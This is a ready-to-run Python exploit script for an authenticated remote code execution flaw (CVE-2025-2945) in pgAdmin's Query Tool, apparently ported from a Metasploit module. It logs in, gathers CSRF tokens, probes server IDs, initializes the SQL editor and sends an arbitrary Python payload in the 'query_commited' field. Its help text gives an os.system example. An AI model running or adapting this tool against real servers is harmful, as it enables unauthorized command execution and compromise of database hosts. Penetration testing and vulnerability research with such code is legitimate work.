#!/usr/bin/env python3
import argparse
import json
import random
import sys
from urllib.parse import urljoin, urlencode
import requests
from faker import Faker
'''
The attacker must possess valid pgAdmin credentials (username/password) to log in via POST /login.
Translated from the Metasploit module "pgAdmin Query Tool authenticated RCE (CVE-2025-2945)".
- Original Ruby: https://github.com/rapid7/metasploit-framework
- This Python script reproduces the same steps:
1) Authenticate to pgAdmin
2) Generate a transaction ID and pick random sgid/did values
3) Iterate over server IDs until one "works", then initialize the SQL editor with that sid
4) POST the payload in the `query_commited` field → a 500 response is expected
'''
# Module-level Faker instance; PgAdminExploit.get_post_data draws its random names from it.
fake = Faker()
class PgAdminExploit:
    """Run the pgAdmin Query Tool request sequence for CVE-2025-2945.

    One ``requests.Session`` is kept for the lifetime of the instance so that
    cookies set while logging in are sent with every later request. Fatal
    conditions print a ``[!]`` message and end the process via ``sys.exit(1)``.
    """

    # Seconds to wait on any single HTTP request. ``requests`` applies no
    # timeout by default, so an unresponsive host would block forever.
    REQUEST_TIMEOUT = 30

    def __init__(self, args):
        """Copy settings from parsed command-line arguments and open a session.

        Args:
            args: Object exposing ``rhost``, ``rport``, ``username``,
                ``password``, ``db_user``, ``db_pass``, ``db_name``,
                ``max_server_id`` and ``payload`` attributes.
        """
        self.rhost = args.rhost
        self.rport = args.rport
        self.username = args.username
        self.password = args.password
        self.db_user = args.db_user
        self.db_pass = args.db_pass
        self.db_name = args.db_name
        self.max_server_id = args.max_server_id
        self.payload = args.payload
        self.scheme = "http"
        self.base_url = f"{self.scheme}://{self.rhost}:{self.rport}"
        self.session = requests.Session()
        # Metasploit's HttpClient sends a User-Agent by default; do the same.
        self.session.headers.update({
            "User-Agent": "Mozilla/5.0 (Exploit Script)",
        })

    def get_csrf_token(self, from_page="/"):
        """Return a CSRF token obtained by requesting ``from_page``.

        The page is fetched first so that cookies get set. The session cookies
        are then checked for ``pga_csrf_token``, ``pgaCookieCsrfToken`` and
        ``csrftoken`` in that order; if none is present, the response HTML is
        searched for a hidden ``csrf_token`` input.

        Args:
            from_page: Path, relative to the base URL, to request.

        Returns:
            The token string.

        Raises:
            SystemExit: With status 1 when no token can be found.
        """
        resp = self.session.get(
            urljoin(self.base_url, from_page),
            allow_redirects=True,
            timeout=self.REQUEST_TIMEOUT,
        )
        # 1) Try the known cookie names.
        for cookie_name in ("pga_csrf_token", "pgaCookieCsrfToken", "csrftoken"):
            if cookie_name in self.session.cookies:
                return self.session.cookies.get(cookie_name)
        # 2) Fallback: pull the value of a hidden form input out of the HTML.
        text = resp.text
        marker = 'name="csrf_token" value="'
        idx = text.find(marker)
        if idx != -1:
            start = idx + len(marker)
            end = text.find('"', start)
            if end != -1:
                return text[start:end]
        print("[!] Unable to retrieve CSRF token. Exiting.")
        sys.exit(1)

    def authenticate(self):
        """Log in to pgAdmin with the configured username and password.

        Fetches a CSRF token from ``/login`` and then POSTs the form fields
        ``email``, ``password`` and ``csrf_token`` to the same URL without
        following redirects.

        Raises:
            SystemExit: With status 1 when the response is not a 302/303.
        """
        print("[*] Fetching CSRF token from login page...")
        csrf_token = self.get_csrf_token("/login")
        login_url = urljoin(self.base_url, "/login")
        data = {
            "email": self.username,
            "password": self.password,
            "csrf_token": csrf_token,
        }
        headers = {
            "Referer": login_url,
        }
        resp = self.session.post(
            login_url,
            data=data,
            headers=headers,
            allow_redirects=False,
            timeout=self.REQUEST_TIMEOUT,
        )
        # pgAdmin typically redirects to /browser/ if login succeeds.
        if resp.status_code not in (302, 303):
            print(f"[!] Login failed or unexpected status code: {resp.status_code}")
            sys.exit(1)
        print("[+] Authenticated to pgAdmin successfully.")

    def get_post_data(self):
        """Build URL-encoded form data with a random title and database id.

        The nested ``selectedNodeInfo`` value is serialized as JSON before
        URL-encoding; ``urlencode`` would otherwise emit the Python ``repr``
        of the dict (single-quoted keys), which is not valid JSON.

        Returns:
            The encoded form body as a string.
        """
        # NOTE(review): confirm the installed Faker exposes ``app_name``.
        title = fake.app_name().lower()
        db_id = fake.app_name().lower()
        form_fields = {
            "title": title,
            "selectedNodeInfo": json.dumps({"database": {"id": db_id}}),
        }
        return urlencode(form_fields)

    def post_initialize_sqleditor(self, trans_id, sgid, sid, did, csrf_token):
        """POST database credentials to the sqleditor initialize endpoint.

        Sends a JSON body with ``user``, ``password``, an empty ``role`` and
        ``dbname`` to
        ``/sqleditor/initialize/sqleditor/{trans_id}/{sgid}/{sid}/{did}``.

        Args:
            trans_id: Transaction id used in the URL.
            sgid: Server group id used in the URL.
            sid: Server id used in the URL.
            did: Database id used in the URL.
            csrf_token: Value sent in the ``X-pgA-CSRFToken`` header.

        Raises:
            SystemExit: With status 1 when the response status is not 200.
        """
        url = urljoin(
            self.base_url,
            f"/sqleditor/initialize/sqleditor/{trans_id}/{sgid}/{sid}/{did}",
        )
        headers = {
            "Content-Type": "application/json",
            "X-pgA-CSRFToken": csrf_token,
        }
        data = {
            "user": self.db_user,
            "password": self.db_pass,
            "role": "",
            "dbname": self.db_name,
        }
        print(f"[*] Initializing SQL editor: trans_id={trans_id}, sgid={sgid}, sid={sid}, did={did}")
        resp = self.session.post(
            url, headers=headers, json=data, timeout=self.REQUEST_TIMEOUT
        )
        if resp.status_code != 200:
            # Best effort: prefer the server's own error message, and fall
            # back to the raw body when it is not the expected JSON shape.
            try:
                err = resp.json().get("result", {}).get("errmsg", "unknown error")
            except Exception:
                err = resp.text or "unknown error"
            print(f"[!] Failed to initialize sqleditor: {err}")
            sys.exit(1)
        print("[+] Successfully initialized sqleditor.")

    def find_valid_server_id(self, sgid, csrf_token):
        """Return the first server id whose connection lookup reports a status.

        Requests ``/sqleditor/get_server_connection/{sgid}/{sid}`` for each
        ``sid`` from 1 to ``max_server_id`` inclusive. Responses that are not
        HTTP 200, are not JSON, or are not shaped like
        ``{"data": {"status": <truthy>}}`` are skipped.

        Args:
            sgid: Server group id used in the URL.
            csrf_token: Value sent in the ``X-pgA-CSRFToken`` header.

        Returns:
            The first matching server id.

        Raises:
            SystemExit: With status 1 when no id in the range matches.
        """
        for sid in range(1, self.max_server_id + 1):
            print(f"[*] Trying server ID: {sid}")
            url = urljoin(
                self.base_url,
                f"/sqleditor/get_server_connection/{sgid}/{sid}",
            )
            headers = {
                "X-pgA-CSRFToken": csrf_token,
                "Content-Type": "application/x-www-form-urlencoded",
            }
            resp = self.session.get(
                url, headers=headers, timeout=self.REQUEST_TIMEOUT
            )
            if resp.status_code != 200:
                continue
            try:
                body = resp.json()
            except ValueError:
                continue
            # The body may be a non-object or carry "data": null; treat both
            # as "no match" instead of raising AttributeError.
            data = body.get("data") if isinstance(body, dict) else None
            if isinstance(data, dict) and data.get("status"):
                print(f"[+] Found valid server ID: {sid}")
                return sid
        print("[!] Failed to find a valid server ID. Try increasing MAX_SERVER_ID.")
        sys.exit(1)

    def sqleditor_init(self, trans_id, csrf_token):
        """Pick random ids, locate a server id and initialize the SQL editor.

        ``sgid`` is drawn from 1..10 and ``did`` from 10000..99999; ``sid``
        comes from ``find_valid_server_id``.

        Args:
            trans_id: Transaction id forwarded to the initialize request.
            csrf_token: CSRF token forwarded to both requests.

        Returns:
            The tuple ``(sgid, sid, did)``.
        """
        sgid = random.randint(1, 10)
        did = random.randint(10000, 99999)
        sid = self.find_valid_server_id(sgid, csrf_token)
        self.post_initialize_sqleditor(trans_id, sgid, sid, did, csrf_token)
        return sgid, sid, did

    def exploit(self):
        """Run the full sequence: log in, initialize the editor, send payload.

        Steps:
            1. ``authenticate()``.
            2. Draw a transaction id from 1_000_000..9_999_999.
            3. Fetch a CSRF token from the query-tool panel page.
            4. ``sqleditor_init()``.
            5. POST ``{"query_commited": payload}`` to
               ``/sqleditor/query_tool/download/{trans_id}`` and report
               whether the response status is the expected 500.

        Raises:
            SystemExit: With status 1 when the final request yields no
                response (connection error or timeout), or when any earlier
                step fails.
        """
        self.authenticate()
        trans_id = random.randint(1_000_000, 9_999_999)
        print(f"[*] Generated transaction ID: {trans_id}")
        # Cookies may have changed at login, so ask for a token again.
        print("[*] Fetching a fresh CSRF token for sqleditor operations...")
        csrf_token = self.get_csrf_token(f"/sqleditor/panel/{trans_id}?is_query_tool=true")
        self.sqleditor_init(trans_id, csrf_token)
        print("[*] Exploiting the target by sending payload...")
        exploit_url = urljoin(self.base_url, f"/sqleditor/query_tool/download/{trans_id}")
        headers = {
            "Content-Type": "application/json",
            "X-PgA-CSRFToken": csrf_token,
            # The Metasploit module also sent a Referer header.
            "Referer": f"{self.base_url}/sqleditor/panel/{trans_id}?is_query_tool=true",
        }
        data = {
            "query_commited": self.payload,
        }
        # requests never returns None; a missing response surfaces as an
        # exception, so that is what the "no response" path has to catch.
        try:
            resp = self.session.post(
                exploit_url,
                headers=headers,
                json=data,
                allow_redirects=False,
                timeout=self.REQUEST_TIMEOUT,
            )
        except requests.RequestException:
            print("[!] No response received from exploit attempt.")
            sys.exit(1)
        if resp.status_code == 500:
            print("[+] Received a 500 response from the exploit attempt (expected).")
            print("[+] If the payload is correct, remote code execution should have occurred.")
        else:
            print(f"[!] Received an unexpected response code: {resp.status_code}")
            print(f" Response body:\n{resp.text}")
def main():
    """Parse the command-line options and run the exploit sequence once."""
    cli = argparse.ArgumentParser(
        description="pgAdmin Query Tool authenticated RCE (CVE-2025-2945) exploit in Python"
    )
    # One (flags, keyword-arguments) entry per option, in display order.
    option_specs = (
        (("--rhost",), {
            "required": True,
            "help": "Target pgAdmin host (IP or hostname)",
        }),
        (("--rport",), {
            "required": False,
            "type": int,
            "default": 80,
            "help": "Target pgAdmin port (default: 80)",
        }),
        (("--username",), {
            "required": True,
            "help": "pgAdmin username",
        }),
        (("--password",), {
            "required": True,
            "help": "pgAdmin password",
        }),
        (("--db-user",), {
            "dest": "db_user",
            "required": True,
            "help": "Database user (to initialize SQL editor)",
        }),
        (("--db-pass",), {
            "dest": "db_pass",
            "required": True,
            "help": "Database password",
        }),
        (("--db-name",), {
            "dest": "db_name",
            "required": True,
            "help": "Database name",
        }),
        (("--payload",), {
            "required": True,
            "help": "Arbitrary Python payload to send in `query_commited`. (e.g. \"__import__('os').system('id')\")",
        }),
        (("--max-server-id",), {
            "dest": "max_server_id",
            "type": int,
            "default": 10,
            "help": "Maximum number of server IDs to try (default: 10)",
        }),
    )
    for flags, settings in option_specs:
        cli.add_argument(*flags, **settings)
    runner = PgAdminExploit(cli.parse_args())
    runner.exploit()
# Run the command-line entry point only when executed as a script, not on import.
if __name__ == "__main__":
    main()